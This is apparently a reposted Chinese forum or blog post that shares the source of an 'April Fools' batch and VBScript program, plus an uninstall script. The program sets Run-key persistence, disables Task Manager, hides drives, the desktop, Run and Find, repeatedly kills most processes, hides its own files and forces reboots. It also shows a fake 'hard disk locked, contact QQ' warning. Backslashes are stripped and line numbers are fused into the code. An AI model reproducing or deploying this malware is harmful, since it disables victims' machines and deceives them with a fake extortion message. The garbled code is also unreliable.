夜火明天就是愚人节了,在逍遥浪子的百度空间里看到他写的一个愚人节程序源码,转来给大家共享
:: Code by逍遥@浪子@ 08-03-31 浪子博客:http://hi.baidu.com/逍遥问 QQ:422547345 :: 流氓怕武术论坛:http://www.du110.com/ DOS联盟论坛:http://www.CN-DOS.net/frome 欢迎您的来访! :: 友情提醒您:源码仅供学习交流用,写成恶意脚本危害他人者,后果自负! @echo off & setlocal EnableDelayedExpansion echo MsgBox “亲爱的朋友,由于你的机器非法使用了逍遥@浪子@提供的P处理,硬盘已经被锁死,若想解锁硬盘,请联系浪子!~ QQ:422547345 ”, 16, “警告!” > C
.vbs1reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun" /v Autodesk /t REG_SZ /d C:v.vbs /f2reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun" /v AutoCAD /t REG_SZ /d C:shouhu.vbs /f3reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableTaskMgr /t reg_dword /d 00000001 /f4echo Windows Registry Editor Version 5.00 >autorun.reg5echo. >>autorun.reg6echo [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer] >>autorun.reg7echo "nodrives"=dword:ffffffff >>autorun.reg8echo "StartMenuLogOff"=dword:00000001 >>autorun.reg9echo "NoRun"=dword:00000001 >>autorun.reg10echo "NoFind"=dword:00000001 >>autorun.reg11echo "nodesktop"=dword:00000001 >>autorun.reg12echo. >>autorun.reg13regedit /s autorun.reg & del /s /q autorun.reg 1>nul14echo alg.exe >>process.ini15echo csrss.exe >>process.ini40 collapsed lines
16echo explorer.exe >>process.ini17echo lsass.exe >>process.ini18echo smss.exe >>process.ini19echo ctfmon.exe >>process.ini20echo services.exe >>process.ini21echo svchost.exe >>process.ini22echo winlogon.exe >>process.ini23echo System >>process.ini24echo System Idle Process >>process.ini25echo Wscript.exe >>process.ini26echo cmd.exe >>process.ini27echo QQ.exe >>process.ini28echo iexplore.exe >>process.ini29echo ^@echo off&Setlocal EnableDelayedExpansion >>taskkill.cmd30echo for /f "tokens=1 delims=," %%a in ('tasklist /nh /FO CSV') do ( >>taskkill.cmd31echo for /f "delims=" %%b in (Process.ini) do ( >>taskkill.cmd32echo set /a flag+=1 >>taskkill.cmd33echo if /i not %%a=="%%b" set /a num+=1 >>taskkill.cmd34echo ) >>taskkill.cmd35echo if !flag! equ !num! ntsd -c q -pn %%a >>taskkill.cmd36echo set /a flag=num=0 >>taskkill.cmd37echo ) >>taskkill.cmd38echo dim ws >>%SYSTEMDRIVE%shouhu.vbs39echo set ws=CreateObject("Wscript.Shell") >>C:shouhu.vbs40echo Do >>%SYSTEMDRIVE%shouhu.vbs41echo Set ws = CreateObject("Wscript.Shell") >>C:shouhu.vbs42echo ws.run "cmd /c taskkill.cmd",vbhide >>C:shouhu.vbs43echo Wscript.Sleep 5000 >>C:shouhu.vbs44echo Loop >>C:shouhu.vbs45echo shutdown -r -f -t 0 >>C:46estart.cmd47for %%d in (process.ini,shouhu.vbs,taskkill.cmd,vbs.vbs,shutdown.vbs) do if not exist C:\%%d copy %%d C:\%%d48for %%f in (process.ini,shouhu.vbs,taskkill.cmd,vbs.vbs,restart.cmd,shutdown.vbs,v.vbs49) do if exist C:\%%f attrib +s +h +r C:\%%d50del taskkill.cmd /q & del process.ini /q51attrib "C:windowsstart menu*.*" +h /s52taskkill /F /im explorer.exe 1>nul & start explorer.exe & start shutdown.vbs53ping 127.0.0.1 -n 300 >nul54shutdown -r -f -t 10 -c "浪子友情提醒你,由于你多次选择稍后重启系统,导致病毒无法正常运行,浪子决定立刻重新启动!"55del %0
以上为主程序,可以保存为任意名字.CMD执行
1do2x = Msgbox("病毒安装完毕!重新启动后生效!是否立刻重新启动电脑? 立刻重启选[是] 稍后重启选[否] ", 4, "是否重新启动?")3Set WshShell = WScript.CreateObject("WScript.Shell")4If x = 6 Then5WshShell.Run "C:6estart.cmd"7WScript.Quit(0)8End If9If x = 7 Then10Wscript.sleep 6000011End If12loop
这段为shutdown.vbs内容
1do2Wscript.Sleep 100003MsgBox "亲爱的朋友,你电脑已经中了愚人节病毒,现在,病毒将迈着矫健的步伐,通过你的身体.... ", 16, "警告!"4Wscript.Sleep 100005MsgBox "亲爱的,我又开始想你了,我对你的爱每天都在巨增,因为有人告诉我:猪肉涨价了,你能卖个好价钱! ", 64, "哟,小样!"6Wscript.Sleep 100007MsgBox "龟兔赛跑,猪做裁判,你说是龟跑得快还是兔子跑得快? ", 64, "哟,小样!"8Wscript.Sleep 100009MsgBox "今天你吃得饱吗?睡得好吗?深夜会冷吗?真想静静地守在你身边。我知道你总是不会照顾自己,每当我一离开,你就从猪栏跳出去! ", 64, "哟,小样!"10Wscript.Sleep 1000011MsgBox "你以后不要再喝醉了,昨天又有人看到你端着个酒杯追着一头猪,嘴里还大叫:是不是兄弟?是兄弟的干了! ", 64, "哟,小样!"12Wscript.Sleep 1000013MsgBox "一只蛐蛐跟猪打赌说:我跳进草里你就看不见我,猪说:我要看得见呢?于是蛐蛐跳进草里。猪在看,猪在看!猪还在看!猪咋还在看呢?! ", 64, "哟,小样!"14Wscript.Sleep 1000015MsgBox "当你一个人空虚寂寞时,铅笔也许是你最好的玩物。你可以用小刀割它,削它,砍它,同时可以发泄自己,高声吼着:我杀笔,我杀笔,我杀笔了 ", 64, "哟,小样!"9 collapsed lines
16Wscript.Sleep 1000017MsgBox "哭了吧傻了吧,幸福的日子没有了吧?早警告过你,不要贪吃贪睡,可你就是不听。这下你该记住了吧,猪长到一定分量就要出栏的。 ", 64, "哟,小样!"18Wscript.Sleep 1000019MsgBox "山谷里传来你的声音,我往下眺望,在山的拐角发现你,是你!真的是你!你和一老翁在一起,我激动的跑过去说:大爷,借驴用用 ", 64, "哟,小样!"20Wscript.Sleep 1000021MsgBox "如果今天晚上有颗星星掉下来砸到了你的头上请不要担心,这是我托神仙送给你的礼物,从此你就会过着无忧无虑的幸福生活,因为―傻掉了。 ", 64, "哟,小样!"22Wscript.Sleep 1000023MsgBox "亲爱的朋友,愚人节快乐!本程序将在24小时后自己卸载,不会对你系统造成任何危害。 ", 64, "愚人节快乐!"24loop
这段为VBS.VBS内容
1echo Windows Registry Editor Version 5.00 >autorun.reg2echo. >>autorun.reg3echo [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer] >>autorun.reg4echo "nodrives"=dword:00000000 >>autorun.reg5echo "StartMenuLogOff"=dword:00000000 >>autorun.reg6echo "NoRun"=dword:00000000 >>autorun.reg7echo "NoFind"=dword:00000000 >>autorun.reg8echo "nodesktop"=dword:00000000 >>autorun.reg9echo. >>autorun.reg10regedit /s autorun.reg & del /s /q autorun.reg 1>nul11
12reg delete "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun" /v Autodesk /f13reg delete "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun" /v AutoCAD /f14
15reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableTaskMgr /t reg_dword /d 00000000 /f2 collapsed lines
16for %%d in (process.ini,shouhu.vbs,taskkill.cmd,vbs.vbs,restart.cmd,shutdown.vbs) do if exist C:\%%d del C:\%%d /q17taskkill /F /im explorer.exe 1>nul & start explorer.exe
这段为卸载程序unstall.CMD
纯粹为写着玩,希望大家能开发出更有创意的P,共同交流,学习进步!~
最后,祝愿大家愚人节快乐!~